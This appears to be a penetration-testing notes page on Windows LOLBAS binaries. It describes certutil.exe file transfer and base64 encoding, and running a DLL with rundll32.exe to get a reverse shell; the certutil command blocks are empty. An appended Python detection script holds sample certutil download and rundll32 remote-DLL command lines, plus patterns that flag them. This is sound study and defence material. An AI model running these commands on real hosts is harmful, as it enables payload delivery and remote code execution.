Windows binaries - LOLBAS
The Windows equivalent of SUID binaries on Linux is LOLBAS (Living Off The Land Binaries, Scripts and Libraries): https://lolbas-project.github.io/
Each of these binaries, scripts and libraries is a Microsoft-signed file that is either native to the operating system or can be downloaded directly from Microsoft, and that has unexpected functionality useful to an attacker.
Transferring Files with Certutil
One classic example is certutil.exe, which is intended for handling certificates but can also be used to transfer files, either by downloading a file to disk or by base64 encoding/decoding a file.
Import a file (run from your Windows target host):
Encode to base64:
Decode a file:
Execute a DLL file with rundll32.exe
A binary such as rundll32.exe can be used to execute a DLL file.
We could use this to obtain a reverse shell by executing a .DLL file that we either download onto the remote host or host ourselves on an SMB share.
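To spot the certutil.exe and rundll32.exe uses described above in process-creation logs, the following added example (not from the original page or the LOLBAS project) classifies command lines. The sample events, rule names and the list of user-writable paths are constructed assumptions.

```python
import re

# Constructed process-creation events (image, command line); not from a real host.
SAMPLE_EVENTS = [
    ("certutil.exe", r"certutil.exe -urlcache -split -f http://files.example.test/a.bin C:\Users\Public\a.bin"),
    ("certutil.exe", r"certutil -encode C:\Temp\in.bin C:\Temp\out.b64"),
    ("certutil.exe", r"CertUtil.exe /decode C:\Temp\out.b64 C:\Temp\in.bin"),
    ("certutil.exe", r"certutil.exe -store My"),
    ("rundll32.exe", r"rundll32.exe \\fileserver.example.test\share\lib.dll,Start"),
    ("rundll32.exe", r"rundll32.exe C:\Users\Public\lib.dll,Start"),
    ("rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

# certutil accepts options with either "-" or "/".
URLCACHE = re.compile(r"(?:^|\s)[-/]urlcache\b", re.I)
BASE64 = re.compile(r"(?:^|\s)[-/](?:encode|decode)(?:hex)?\b", re.I)
# Assumed list of user-writable locations; tune it for your environment.
USER_WRITABLE = re.compile(r"^[a-z]:\\(?:users|programdata|temp|windows\\temp)\\", re.I)


def classify(image, cmdline):
    """Return the (hypothetical) rule names one process-creation event matches."""
    name = image.lower().rsplit("\\", 1)[-1]
    # Simplification: assumes the executable token contains no spaces.
    parts = cmdline.split(None, 1)
    args = parts[1] if len(parts) > 1 else ""
    hits = []
    if name == "certutil.exe":
        if URLCACHE.search(args):
            hits.append("certutil_download")
        if BASE64.search(args):
            hits.append("certutil_base64")
    elif name == "rundll32.exe":
        target = args.lstrip().lstrip('"')
        if target.startswith("\\\\"):
            hits.append("rundll32_unc_dll")
        elif USER_WRITABLE.match(target):
            hits.append("rundll32_user_writable_dll")
    return hits


def triage(events):
    """Return only the events that matched at least one rule."""
    return [(cmd, hits) for image, cmd in events if (hits := classify(image, cmd))]


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmd)
```

Routine certificate-store use of certutil.exe and rundll32.exe calls into System32 DLLs pass through unflagged, which keeps the noise down when this runs over real process-creation telemetry.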
Last update: 2025-05-18 Created: May 23, 2023 19:56:20